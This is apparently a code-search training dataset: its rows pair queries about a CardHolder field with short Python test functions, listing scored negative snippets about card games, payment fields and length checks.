query
stringlengths
9
3.4k
document
stringlengths
9
87.4k
metadata
dict
negatives
sequencelengths
4
101
negative_scores
sequencelengths
4
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Send numerical value in CardHolder field
def test_28(self): assert 'False' == Api.requestBlock('test-28')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_card_value(self, card):\n if card >= 10:\n return 10\n if card == 1:\n return 11\n return card", "def __str__(self):\n return self.card_no", "def value(self, card):\n return self.valores[self.deck.index(card)]", "def __init__(self, cardname, amount):\n self.cardname = str(cardname)\n self.amount = int(amount)", "def get_card_number():\n\n return get_or_append_details('card_number', \"Please enter your credit card number\")", "def get_credit_card_number(self):\n\t\tif len(self.credit_card_number) == 16:\n\t\t\treturn self.credit_card_number\n\t\tr(400, {\"message\" : \"please provide the amount to process\"})\n\t\treturn", "def get_card_val(card):\n\n if card == '1':\n return 1\n if card == '2':\n return 2\n if card == '3':\n return 3\n else:\n return 4", "def card_value (card):\r\n value = card[0]\r\n if value in ['Jack','Queen','King']:\r\n return 10\r\n if value in [2,3,4,5,6,7,8,9,10]:\r\n return value\r\n else:\r\n raise 'CardValueError'", "def safe_number(self):\n mask = '*' * (len(self.card_number) - 4)\n return '{0}{1}'.format(mask, self.card_number[-4:])", "def getNumber():", "def number(self):", "def _set_instructed_amount_33B(self, val):\n self.swift_obj.CurrencyInstructedAmount = val\n self.swift_obj.CurrencyInstructedAmount.swiftTag = \"33B\"", "def _set_details_of_charges_71A(self, val):\n self.swift_obj.DetailsOfCharges = val\n self.swift_obj.DetailsOfCharges.swiftTag = '71A'", "def get_card(self):\n\n card = random.randint(1,13)\n return card", "def card_html_id(card):\n return f'c{card:02d}'", "def convNumToCard(cardNum):\n\n\tcardDict = {14:\"A\", 13:\"K\", 12:\"Q\", 11:\"J\"}\n\n\tif cardNum > 10:\n\t\treturn cardDict[cardNum]\n\telse: return str(cardNum)", "def test_value(self):\n hand = self._hand\n cards = [BjCard('clubs', '10'), BjCard('diamonds', 'A')]\n for card in cards:\n hand.add_card(card)\n self.assertEqual(hand.value, 21)", "def test_card_value(mock_card):\n assert mock_card.value == 1", "async def get_card_value(card):\n return ex.first_result(await ex.conn.fetchrow(\"SELECT value FROM blackjack.cards WHERE id = $1\", card))", "def set_card (self, card):\n\t\tif ((card == 1) or (card == 2)):\n\t\t\tself._card = card\n\t\telse:\n\t\t\tsys.stderr.write(\"\\nERROR : %s card number must be 1 or 2 so it can't be %s !\\n\" % (self._target_id, card))\n\t\t\tsys.exit(1)", "def _convert_charge(val: str) -> str:\n try:\n int_val = int(val)\n # negative value will take care of itself\n sign = \"+\" if int_val > 0 else \"\"\n return f\"{sign}{int_val}\"\n except:\n return val", "def define_card_value(char):\n if char == '2':\n return Value.TWO\n elif char == '3':\n return Value.THREE\n elif char == '4':\n return Value.FOUR\n elif char == '5':\n return Value.FIVE\n elif char == '6':\n return Value.SIX\n elif char == '7':\n return Value.SEVEN\n elif char == '8':\n return Value.EIGHT\n elif char == '9':\n return Value.NINE\n elif char == 'T':\n return Value.TEN\n elif char == 'J':\n return Value.JACK\n elif char == 'Q':\n return Value.QUEEN\n elif char == 'K':\n return Value.KING\n elif char == 'A':\n return Value.ACE\n else:\n return Value.UNDEFINED", "def BJValue(self):\r\n #if the face value of a card is greater or equals to 10\r\n if self.rank >= 10:\r\n #count the value as 10\r\n return 10\r\n #if the face value of a card is less than 10\r\n else:\r\n #return the face value of the card\r\n return self.rank", "def getCardNumber(self,message):\n card = re.findall(Analyzer.rgxCard,message.lower())\n return card[0]", "def getamount(self):\n return self.__amount", "def get_card (self, card):\n\t\treturn self._card", "def _format_details_of_charges_71A(self, val):\n return val", "def test_value_hard_hand(self):\n hand = self._hand\n cards = [BjCard('spades', '6'), BjCard('hearts', 'A'), BjCard('clubs', 'K')]\n for card in cards:\n hand.add_card(card)\n self.assertEqual(hand.value, 17)", "def card(n):\r\n assert type(n) == int and n > 0 and n <= 13, \"Bad card n\"\r\n specials = {1: 'A', 11: 'J', 12: 'Q', 13: 'K'}\r\n return specials.get(n, str(n))", "def validate_card():\r\n print(\"Please insert your card\")\r\n card = int(input(\"Please enter 1 if you entered your card\"))\r\n return card", "def setNumPurchased(self, val):\n self.numberPurchased = val", "def get_card(self):\n return self.card", "def card_key(self):\n card_rank = self.rank\n if card_rank > 9:\n card_rank = Card.rank_short[card_rank]\n card_image_name = str(card_rank) + Card.suits_short[self.suit]\n return str(card_image_name)", "def card_id(self):\n return self._card_type.numbers if self._card_type is not None else self._repport", "def test_value_soft_hand(self):\n hand = self._hand\n cards = [BjCard('diamonds', '7'), BjCard('hearts', 'A')]\n for card in cards:\n hand.add_card(card)\n self.assertEqual(hand.value, 18)", "def raw_value(self, value):\n if value is None:\n value = 0\n\n self.__value = value", "def get_card_str(self, card):\n card_str = str(card)\n if card == 11:\n card_str = \"Jack\"\n if card == 12:\n card_str = \"Queen\"\n if card == 13:\n card_str = \"King\"\n if card == 1:\n card_str = \"Ace\"\n \n return card_str", "def __repr__(self):\n return f\"Card({self.face}, {self.value}, {self.suit})\"", "def card(self):\n return self.cdb.name_to_card[self.card_name]", "def Value(self) -> str:", "def get_value(self):\r\n return 0", "def deal_card(self, player: BaseBlackjackPlayer, is_open: bool = True) -> str:\n card = self.deck.pick_card(discard=True, is_open=is_open)\n player.hand.cards.append(card)\n return f\"\\n{player.username} received {card}. Total is: {player.hand.value}\"", "def short(self, amount):", "def get_card_info(card):\n result = ((card-1)/13 + 1, card - ((card-1)/13)*13)\n return result", "def raw(self, raw):\n self.uw.send('%s.val = %.4f' % (self.name, self.clipRawLimits(raw)))", "def sendValue(self, value):\n\n print(f'Sending: {value}\\n')\n self.ser.write(bytes([value]))\n self.ser.write('\\n'.encode(\"ascii\"))\n\n self.ser.reset_input_buffer()\n ser_bytes = self.ser.read(1)\n print(f'Receiving\\nraw data: {ser_bytes}')\n\n\n #decoded_bytes = (ser_bytes.decode(\"ascii\"))\n\n #print(f'Ascii Value: {decoded_bytes}', flush=True)", "def __str__(self):\n #Create dictionary for face cards\n translate = {11:'Jack', 12:'Queen', 13:'King', 14: 'Ace'}\n r = self._rank\n #check for face card\n if r in [11, 12, 13, 14]:\n myrank = translate[r]\n else:\n myrank = str(r)\n return myrank + \" of \" + self._suit", "def send(value):\r\n return value", "def click_card1(self):\n self.driver.find_element_by_css_selector(self.CSS_CVV1).click()\n self.driver.find_element_by_css_selector(\"#cvv > input\").send_keys('111')", "def do_cardid(self, line):\n if self.bootstrap() != 0:\n return self.return_code(1, True)\n\n key = self.card.get_pubkey()\n key_fmted = self.format_pubkey(key)\n\n print('\\nCard ID: %s' % key_fmted)\n return self.return_code(0)", "def __repr__(self):\n val = self.value\n for k, v in Card.VALUES.iteritems():\n if self.value == v:\n val = k\n return str.format('{0}{1}', val, self.suit)", "def get_value(self):", "def charge(self, other):\n if self.flag:\n self.credit += other\n return \"{} Tomans has been added to your card credit and now the credit of your card is {} Tomans\".format(\n other, self.credit)\n else:\n return \"Sorry, your card has expired.\"", "def number(self):\n return str(self._phone)", "def __init__(self, suit: str, rank: str) -> None:\n self.suit = suit\n self.rank = rank\n self.value = Card.values[rank]\n self.hidden = False", "def long(self, amount):", "def mecard(name, tel, email):\n return f'MECARD:N:{name};TEL:{tel};EMAIL:{email};'", "def get_amount(self): \n return len(self.get_cards())", "def get_value(self, character):\n return character.numbers[self.item]", "def value(self):\n return int(self.input.text())", "def value(self):\n return self.raw.get_attribute(\"value\")", "def getAcNum(self):\n\n # stores the integer account number as a formatted 3-digit string (in which 0's occupy unused digits)\n strAcNum = str(\"{self.acNum:03d}\".format(self=self))\n return strAcNum", "def take_card(self, card_color=None):\r\n Card = self.deck.take_card(card_color)\r\n return Card.value if Card.color == Color.BLACK else Card.value * -1", "def _translate_card(self):\n if isinstance(self.suit, int):\n\n if self.suit == 0:\n name, self.values = self._assign_names(self.rank)\n self.name = \"{} of spades\".format(name)\n\n elif self.suit == 1:\n name, self.values = self._assign_names(self.rank)\n self.name = \"{} of hearts\".format(name)\n\n elif self.suit == 2:\n name, self.values = self._assign_names(self.rank)\n self.name = \"{} of diamonds\".format(name)\n\n elif self.suit == 3:\n name, self.values = self._assign_names(self.rank)\n self.name = \"{} of clubs\".format(name)\n\n else:\n raise ValueError(\"The integer passed to the method must be 0, 1, 2, 3\")\n\n else:\n raise TypeError(\"The argument for the method must be an integer\")\n\n return self.name, self.values", "def set_charge(self, val):\n\t\tself.charge = max(0., min(1., val))\n\t\tif self.font:\n\t\t\tself.text = self.font.render('%d%%' % int(100*self.charge), True, self.style.t_color)\n\t\tself.update()", "def display_number(com,count):\n print \"NUM: \", count\n try:\n if count > 999:\n count = 999\n safenum=str(int(count))\n #com = serial.Serial(config.devnum, 9600, timeout=3)\n #com.close()\n #com.open()\n comstr = config.num['display']+safenum+config.num['eot']\n com.write(comstr)\n #com.close()\n except serial.SerialException as e:\n logging.warning(\"Serial exception: \"+str(e))", "def _set_remittance_information_70(self, val):\n self.swift_obj.RemittanceInformation = val\n self.swift_obj.RemittanceInformation.swiftTag = '70'", "def add_number(self, element):\n\n element.no = self.get_available_number(element.grp)", "def card(self, c=None):\n if c: self._card = c\n return self._card", "def demote(self):\n if self.rank != \"A\":\n raise TypeError(\"Card must be an Ace\")\n else:\n self.value = 1", "def charge(self, other):\n self.credit += other\n print(\"{} Tomans has been added to your card credit and now the credit of your card is {} Tomans\".format(other,\n self.credit))", "def deal_cards(self):\n self.card = random.randint(1, 13)\n return self.card", "def get_value(self):\n if self.name in ['1','2','3','4','5','6','7','8', '9', '10']:\n return int(self.name)\n if self.name in ['J','Q','K']:\n return 10\n if self.name == 'A':\n return 1", "def _validate_details_of_charges_71A(self, val):\n return val", "def printCardDetails(self):\n \n print(\"\\nCard Details - {self.name}\\nCard Number: {self.cardNum}\\nExpiry Date (mm/yy): {self.cardExp[0]:02d}/{self.cardExp[1]:02d}\".format(self=self))", "def getNumber(self):\n return self.number", "def clean_value(self):\n value = self.cleaned_data[\"value\"]\n m = value[-1].lower()\n if m in self.MULTIPLIERS:\n mp = self.MULTIPLIERS[m]\n value = value[:-1]\n else:\n mp = 1\n try:\n value = int(value)\n except ValueError:\n raise forms.ValidationError(_(\"Integer is required\"))\n return value * mp", "def __call__(self, value):\n\n print('\\r', end='')\n self.updateAmount(value)\n writec(str(self), self.color, self.style)\n sys.stdout.flush()", "def getValue(self) -> int:\n ...", "def _format_contract_number_partyA_21N(self, val):\n return val", "def _apply_scalar_cards(model, model2_renumber):\n if model.aero is None and model2_renumber.aero:\n model.aero = model2_renumber.aero\n if model.aeros is None and model2_renumber.aeros:\n model.aeros = model2_renumber.aeros\n model.mkaeros += model2_renumber.mkaeros\n for key, param in model2_renumber.params.items():\n if key not in model.params:\n model.params[key] = param", "def safe_number(self):\n mask = '*' * (len(self.account_number) - 4)\n return '{0}{1}'.format(mask, self.account_number[-4:])", "def get_value(self):\n bj_rankings = {'Ace': 11, 'King': 10, 'Queen': 10, 'Jack': 10,\n 10: 10, 9: 9, 8: 8, 7: 7, 6: 6, 5: 5, 4: 4, 3: 3, 2: 2}\n value = 0\n for card in self.cards:\n value += bj_rankings[card.rank]\n\n if value > 21:\n bj_rankings['Ace'] = 1\n value = 0\n for card in self.cards:\n value += bj_rankings[card.rank]\n return value", "def value(self):", "def _setbeneficiary_customer_59F(self, val):\n self.swift_obj.BeneficiaryCustomer_F = val\n self.swift_obj.BeneficiaryCustomer_F.swiftTag = '59F'", "def encode_extra_field(self, relative_orbit):\n if isinstance(relative_orbit, int):\n return \"{:03d}\".format(relative_orbit)\n else:\n return relative_orbit", "def __init__(self, number: str, suit: str) -> None:\n self.number = number\n self.suit = suit", "def kpi_card4(df=data):\n total = df['passenger_count'].sum().round()\n return [\n html.H4('Total Passenger Amount', className='card-title'),\n html.P(f'{int(total):,d}', className='card-value'),\n ]", "def blackjackValue(self):\n NUMBERRANKS = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\"]\n FACECARDS = [\"jack\", \"queen\", \"king\"]\n ACE = [\"ace\"]\n if self.rank in NUMBERRANKS:\n return int(self.rank)\n elif self.rank in FACECARDS:\n return 10\n elif self.rank in ACE:\n return 11", "def test_prepare_value_int(self):\n field = FractionField()\n result = field.prepare_value(1)\n self.assertEqual(\"1\", result)", "def serial_number(self):\n return self._packet.get('serial-number', '')", "def __card_display(self):\n return ''.join([(each_number if (i == 0 or i % 4 != 0) else ' ' + each_number)\n for i, each_number in enumerate(self.card_number)])", "def _format_senders_reference_20(self, val):\n if val:\n sett_obj = acm.FSettlement[str(val)]\n val = \"%s-%s-%s-%s\" % (get_settlement_reference_prefix(), str(val), str(get_message_version_number(sett_obj)), str(self.swift_message_type[2:5]))\n return val", "def __init__(self, value, suit) -> None:\n self.value = value\n self.suit = suit", "def __str__(self):\n\n\t\tif self.rawValue == None: return str()\n\n\t\tx = self.rawValue\n\n\t\tif not x.isdigit() or len(x) != 44 or len(set(x)) == 1:\n\t\t\treturn self.rawValue\n\n\t\treturn '{} {} {} {} {} {} {} {} {} {} {}'.format(x[:4], x[4:8], x[8:12], x[12:16], x[16:20], x[20:24], x[24:28], x[28:32], x[32:36], x[36:40], x[40:44])", "def __init__(self, currency, value):\n assert isinstance(value, six.integer_types)\n assert not isinstance(currency, six.string_types)\n self.currency = currency\n self.value = value", "def data(value):\n return value", "def _set_contract_number_partyA_21N(self, val):\n self.swift_obj.SequenceA_GeneralInformation.ContractNumberPartyA = val\n self.swift_obj.SequenceA_GeneralInformation.ContractNumberPartyA.swiftTag = '21N'", "def __int__(self):\n\n return self.value", "def __init__(self, number):\n self.number = number\n self.available = True", "def on_change_renew(self, cr, uid, ids, enrich_id, context=None):\n enrich = self.browse(cr, uid, enrich_id, context=context)\n \tamount=enrich.amount\n\n \treturn {\n \t'value': {\n 'amount': amount,\n }\n }" ]
[ "0.6360001", "0.6286262", "0.6143093", "0.61399215", "0.61090577", "0.609702", "0.5950806", "0.58012486", "0.5681816", "0.566631", "0.564746", "0.55345756", "0.5511834", "0.55029047", "0.54479784", "0.5423257", "0.54220426", "0.54016936", "0.53752905", "0.536577", "0.53501254", "0.53398013", "0.5339342", "0.5336879", "0.53362066", "0.5329999", "0.5321045", "0.52628565", "0.5261947", "0.52504355", "0.5227937", "0.522581", "0.52186036", "0.5191723", "0.51826274", "0.51807934", "0.5168586", "0.5166014", "0.51495695", "0.5148456", "0.5147658", "0.51458186", "0.514444", "0.51413226", "0.5119736", "0.51184475", "0.51112795", "0.5096098", "0.5088141", "0.5087697", "0.5082579", "0.5080768", "0.5079714", "0.5062923", "0.50615937", "0.50554466", "0.50550157", "0.5051366", "0.5050202", "0.5039322", "0.503709", "0.50280315", "0.5027244", "0.5012447", "0.5007388", "0.5003274", "0.5001084", "0.49970353", "0.4991981", "0.49857655", "0.49832943", "0.4978152", "0.49748248", "0.49744305", "0.49687928", "0.4967739", "0.4961532", "0.49586734", "0.49579978", "0.49572575", "0.49564964", "0.49539265", "0.49490628", "0.49488655", "0.49424526", "0.4938662", "0.49370182", "0.49354938", "0.49289268", "0.49288493", "0.49230748", "0.49196404", "0.49184033", "0.49157763", "0.4915192", "0.49148068", "0.4906672", "0.49050424", "0.48988315", "0.48987618", "0.48972172" ]
0.0
-1
Check length of CardHolder field (len = 30)
def test_29(self): assert 'True' == Api.requestBlock('test-29')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def len12(self, len): # -> None:\n ...", "def get_length(self):\n return len(self.cards)", "def test_partial_deck_has_fewer_cards(self):\n self.assertEqual(len(self.partialDeck.deck), 46)", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def __len__(self):\n return len(self.cards)", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def test_shared_cards_len(self):\n self.assertEqual(len(self.hand.sharedCards), 3)", "def _check_field_length(self, field, value, options=None):\n options = options if options else field.GetOptions()\n for (option, setting) in options.ListFields():\n if option.name == \"length\":\n if self.__gt_by_type(value, setting):\n if hasattr(field, \"name\"):\n raise FieldTooLongException(\"The field '\" + field.name +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")\n else:\n raise FieldTooLongException(\"List element '\" + str(value) +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")", "def __len__(self):\n return len(self._cards)", "def __len__(self):\n return len(self._cards)", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def get_length(self):\r\n return len(self.deck)", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def __len__( self ):\n \n return len(self.__deck)", "def check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def verify_length(src_json):\n error: str = \"\"\n if len(src_json.get(\"LedGroups\", [])) == 0:\n error = \"No or empty LedGroups\"\n if len(src_json.get(\"Sequencers\", [])) == 0:\n error = \"No or empty Sequencers\"\n return error", "def verify_length(src_json: Dict[str, List[str]]):\n if len(src_json.get(\"Leds\", [])) == 0:\n return \"No Leds in Group\"", "def len23(self, len): # -> None:\n ...", "def __len__(self):\n return len(self._cards)", "def test_lengths(self):\n self.assertEqual(size(attempt.Z), 201)\n self.assertEqual(size(attempt.W), 201)", "def length_of_name(self, name):\n length = len(name)\n if length > 10:\n self.show_message_when_name_very_long()\n return length", "def length(value):\n\n # Try to return the length\n return len(value)", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def __len__(self):\n return 30", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[f\"POST /1234 HTTP/1.1\\r\\nHost: localhost\\r\\nX-Long: {'1' * 320}\\r\\n\\r\\n\"],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def test_uid_max_length(self):\n\n field = self.image._meta.get_field(\"uid\")\n self.assertEqual(field.max_length, 64)", "def __len__(self):\n return len(self.raw)", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[self.post_request + [(\"header\", \"x\" * 320)]],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def check_bag_size(self):\r\n return len(self.db.tilestring)", "def validate_length(column_name, value, length):\n valuelength = len(value)\n if valuelength > int(length) >= 0:\n return \"{0} : value '{1}' is greater than the specified length {2}\".format(column_name, value, length)\n elif valuelength < int(length) and int(length) >= 0:\n return \"{0} : value '{1}' is less than the specified length {2}\".format(column_name, value, length)\n\n return None", "def length(self):\n ...", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def _matchLength(self, length: int):\n return self._comparator['Length'] < length", "def __len__(self) -> int:\n return len(self.length)", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def test_field_length_matches_data_type_field_length(self):\n for known_message_type in KNOWN_MESSAGE_TYPES:\n for field in known_message_type.fields:\n if self.is_verbose:\n print 'Checking length setup of field {0} in message {1}'.format(field.name, known_message_type.name)\n self.assertEqual(field.length, field.data_type.length)", "def test_client_ip_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_ip').max_length\n self.assertEquals(max_length, 100)", "def _requiredLength(self):\n if self.partner is not None:\n if self.partner.level == self.level:\n return len(self.partner)\n elif self.partner.level < self.level:\n return 1\n elif self._value is not None:\n return 1\n else:\n return 0", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def validate_length(string):\n if len(string) > 110:\n raise ValidationError('Tweet must be less than 110 characters')", "def validVarConstructLength(self,varlen):\r\n if len(varlen)!=2:\r\n print 'variable must specify name and type'\r\n return False\r\n else:\r\n return True", "def test_deck_has_52_cards(self):\n self.assertEqual(len(cardutils.Deck().deck), 52)", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def Length(self) -> int:", "def Length(self) -> int:", "def __len__(self):\r\n return 4", "def __len__(self) -> int:\n return 3", "def remaining_cards(self):\n\n return str(len(self.hand))", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_len(self):\n self.assertEqual(len(self.tester), 30)", "def field_length(self,\r\n entrylist=None):\r\n\r\n\r\n if entrylist is None:\r\n entrylist = list(self.default_dict['field'].keys())\r\n maxlength = 0\r\n for i_temp in entrylist:\r\n if len(self.default_dict['field'][i_temp]) > maxlength:\r\n maxlength = len(self.default_dict['field'][i_temp])\r\n return maxlength", "def __len__(self):\n\t\treturn 3", "def __len__():", "def __len__():", "def __len__():", "def check_embed(embed: Embed) -> bool:\n if len(embed) <= 6000:\n if hasattr(embed, \"title\"):\n if len(embed.title) <= 256:\n pass\n else:\n return False\n if len(embed.fields) <= 25:\n for field in embed.fields:\n if len(field.name) <= 69420:\n pass", "def test_check_name_is_3_parts():\n check_name_length()", "def length(self):\n pass", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.CompoundingConversationDataset())) == 131569", "def test_prep_charfield_size(self):\n pass", "def __len__(self):\n return self._length # pylint: disable = E1101", "def reallength(value):\n try:\n value.count()\n except:\n return len(value)", "def test_client_email_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_email').max_length\n self.assertEquals(max_length, 100)", "def __length_hint__(self) -> 'Literal[28]':\n return 28", "def __len__(self) -> int:\n return self.length", "def __len__(self):\n\n return self.length", "def __len__(self) -> int:\n return len(self.getvalue())", "def __len__(self):\n return 19", "def test_candidatesubr_len(self):\n\n self.assertEqual(len(self.cand_subr), 3)", "def format_length( self, key ) :\r\n\r\n return struct.calcsize( self[key] )", "def test_len(self):\n self.assertEqual(len(self.tester), 21)", "def invalid_caterpillar_length(length):\n try:\n length = int(length)\n except ValueError:\n return \"`caterpillar-length` must be something that can be cast to an `int`\"\n\n if not 1 <= length <= len(app.desk.indeces):\n return (\n \"`caterpillar-length` must be a number between \"\n f\"1 and {len(app.desk.indeces)}\"\n )\n\n return False", "def __len__(self):\n # TODO: Is this method used?\n return self._info['length']", "def length(self) -> int:\n pass", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def __len__(self) -> int:\n return len(self.value)", "def __len__(self):\n return len(self.content)", "def __len__(self):\n return len(self.content)", "def __len__(self):\n return len(self.content)", "def __len__(self):\n return self.cli.passwords.len()", "def __len__(self):\n return len(self._canaux)", "def getLength(self):\n return None", "def getLength(self):\n return None", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def _validate_string_max_length(self, value):\n if self.max_length is not None:\n return len(str(value)) <= self.max_length\n else:\n return True", "def _check_description_count(self):\n\n for rec in self:\n if rec.description and len(rec.description)>50:\n raise except_orm(_('Warning!'),\n _(\"Description Lenght must be less than or equal to 50. \"))", "def __len__(self):\n return 20", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def __len__(self):\n return len(self.spricht())", "def __len__(self):\n\t\treturn 8" ]
[ "0.6906881", "0.64856213", "0.645354", "0.6432503", "0.6383984", "0.6370204", "0.63560504", "0.63330877", "0.6323368", "0.6306261", "0.62849426", "0.62839264", "0.6276887", "0.6276887", "0.62720317", "0.6252744", "0.6238115", "0.6228162", "0.6224199", "0.6197445", "0.6196399", "0.61821103", "0.6167665", "0.61317706", "0.6107292", "0.6106109", "0.6056621", "0.60298043", "0.601517", "0.6013158", "0.6000801", "0.59928536", "0.5988711", "0.5975681", "0.595917", "0.59409523", "0.5914727", "0.5914727", "0.5912202", "0.59087175", "0.5907185", "0.59012663", "0.5896035", "0.58920324", "0.5883397", "0.58755434", "0.58733696", "0.5867748", "0.58617574", "0.58617574", "0.58617574", "0.58617574", "0.58617574", "0.58617574", "0.58505076", "0.58505076", "0.5850485", "0.5846937", "0.58373874", "0.583465", "0.5831536", "0.5828399", "0.5823291", "0.5808147", "0.5808147", "0.5808147", "0.5805381", "0.58037776", "0.5800443", "0.57970846", "0.5793131", "0.57914805", "0.5787952", "0.577915", "0.5777581", "0.57661694", "0.5766112", "0.57613033", "0.5757113", "0.5755749", "0.5747707", "0.5745179", "0.57435066", "0.57393545", "0.57276344", "0.5724594", "0.5724253", "0.5720317", "0.5720317", "0.5720317", "0.57145506", "0.5712677", "0.57100415", "0.57100415", "0.57059973", "0.5705907", "0.5699107", "0.56951535", "0.5691765", "0.56852823", "0.5683927" ]
0.0
-1
Check length of CardHolder field (len = 31)
def test_30(self): assert 'False' == Api.requestBlock('test-30')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def test_shared_cards_len(self):\n self.assertEqual(len(self.hand.sharedCards), 3)", "def get_length(self):\n return len(self.cards)", "def __len__(self):\n return len(self.cards)", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def __len__(self):\n return len(self._cards)", "def __len__(self):\n return len(self._cards)", "def len12(self, len): # -> None:\n ...", "def verify_length(src_json):\n error: str = \"\"\n if len(src_json.get(\"LedGroups\", [])) == 0:\n error = \"No or empty LedGroups\"\n if len(src_json.get(\"Sequencers\", [])) == 0:\n error = \"No or empty Sequencers\"\n return error", "def __len__( self ):\n \n return len(self.__deck)", "def __len__(self):\n return len(self._cards)", "def test_partial_deck_has_fewer_cards(self):\n self.assertEqual(len(self.partialDeck.deck), 46)", "def get_length(self):\r\n return len(self.deck)", "def verify_length(src_json: Dict[str, List[str]]):\n if len(src_json.get(\"Leds\", [])) == 0:\n return \"No Leds in Group\"", "def test_lengths(self):\n self.assertEqual(size(attempt.Z), 201)\n self.assertEqual(size(attempt.W), 201)", "def len23(self, len): # -> None:\n ...", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def __len__(self):\n return len(self.raw)", "def length(value):\n\n # Try to return the length\n return len(value)", "def _check_field_length(self, field, value, options=None):\n options = options if options else field.GetOptions()\n for (option, setting) in options.ListFields():\n if option.name == \"length\":\n if self.__gt_by_type(value, setting):\n if hasattr(field, \"name\"):\n raise FieldTooLongException(\"The field '\" + field.name +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")\n else:\n raise FieldTooLongException(\"List element '\" + str(value) +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")", "def 